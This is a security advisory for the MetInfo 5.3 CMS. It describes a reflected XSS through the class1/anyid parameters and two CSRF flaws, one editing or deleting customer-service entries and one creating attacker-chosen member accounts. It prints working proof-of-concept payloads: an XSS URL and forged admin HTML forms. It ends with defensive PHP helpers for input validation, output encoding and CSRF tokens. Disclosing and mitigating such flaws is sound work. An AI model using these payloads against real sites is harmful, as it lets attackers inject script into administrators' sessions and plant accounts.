XSS
The MetInfo5.3 application is vulnerable to cross-site scripting (XSS). Attackers can inject arbitrary web script or HTML via the class1 parameter or the anyid parameter to admin/index.php.
Vulnerable parameters: class1, anyid
PoC:
http://127.0.0.1/MetInfo5.3/admin/index.php?n=content&c=article_admin&a=doindex&class1=2"><script>alert(111)</script>&lang=cn&anyid=29"><script>alert(111)<%2fscript>

CSRF-1
The MetInfo5.3 application is vulnerable to cross-site request forgery (CSRF). A successful CSRF attack can force the administrator to add a malicious online customer service.
PoC:
<html>
<body>
<form action="http://127.0.0.1/MetInfo5.3/admin/interface/online/delete.php?anyid=71&lang=cn&class1=" method="POST">
<input type="hidden" name="allid" value="6," />
<input type="hidden" name="action" value="editor" />
<input type="hidden" name="id" value="6" />
<input type="hidden" name="no_order_6" value="1" />
<input type="hidden" name="name_6" value="mm" />
<input type="hidden" name="qq_6" value="123123" />
<input type="hidden" name="msn_6" value="" />
<input type="hidden" name="taobao_6" value="mm123" />
<input type="hidden" name="alibaba_6" value="mm123" />
<input type="hidden" name="skype_6" value="" />
<input type="hidden" name="saveorder" value="保存" />
<input type="hidden" name="action_type" value="del" />
<input type="hidden" name="allid" value="6," />
<input type="submit" value="Submit request" />
</form>
</body>
</html>


CSRF-2
The MetInfo5.3 application is vulnerable to cross-site request forgery (CSRF). A successful CSRF attack can force the administrator to add a member with an attacker-specified username and password.
PoC:
<html>
<body>
<form action="http://127.0.0.1/MetInfo5.3/admin/index.php?lang=cn&anyid=73&n=user&c=admin_user&a=doaddsave" method="POST">
<input type="hidden" name="username" value="www" />
<input type="hidden" name="password" value="123456" />
<input type="hidden" name="groupid" value="1" />
<input type="hidden" name="valid" value="1" />
<input type="submit" value="Submit request" />
</form>
</body>
</html>
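
Mitigation for both issues above, as an added example that is not MetInfo's code and not part of the original advisory. The function names id_param, h, csrf_token and csrf_check and the csrf_token form field are hypothetical, and treating class1 and anyid as numeric ids is an assumption drawn from the PoC URLs.

```php
<?php
declare(strict_types=1);

// Hypothetical hardening helpers (not MetInfo code) for the two bug classes above.

// XSS: class1 and anyid look like numeric ids in the PoC URLs (assumption),
// so accept digits only and fall back to a default instead of echoing raw input.
function id_param(array $query, string $name, int $default = 0): int
{
    $raw = $query[$name] ?? '';
    return (is_string($raw) && $raw !== '' && ctype_digit($raw)) ? (int) $raw : $default;
}

// XSS: encode anything that still has to be written into HTML or an attribute.
function h(string $value): string
{
    return htmlspecialchars($value, ENT_QUOTES | ENT_SUBSTITUTE, 'UTF-8');
}

// CSRF: one random token per admin session, embedded in every admin form.
function csrf_token(array &$session): string
{
    if (empty($session['csrf_token'])) {
        $session['csrf_token'] = bin2hex(random_bytes(32));
    }
    return $session['csrf_token'];
}

// CSRF: state-changing actions must be POST and carry the session's token.
function csrf_check(array $session, string $method, array $post): bool
{
    $sent = $post['csrf_token'] ?? '';
    $expected = $session['csrf_token'] ?? '';
    return $method === 'POST'
        && is_string($sent) && is_string($expected) && $expected !== ''
        && hash_equals($expected, $sent);
}

// Constructed requests shaped like the PoCs above.
$session = [];
$token = csrf_token($session);
$query = ['class1' => '2"><script>alert(111)</script>', 'anyid' => '29'];

var_dump(id_param($query, 'class1'));  // class1 value taken from the XSS PoC
var_dump(h($query['class1']));         // same value, encoded for HTML output
var_dump(csrf_check($session, 'POST', ['username' => 'www']));                         // forged form, no token
var_dump(csrf_check($session, 'POST', ['username' => 'www', 'csrf_token' => $token])); // form rendered for the admin
```

In an application, csrf_check would run before handlers such as the delete.php and doaddsave actions targeted by the PoC forms make any change, with $_SESSION, $_SERVER['REQUEST_METHOD'] and $_POST passed in.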


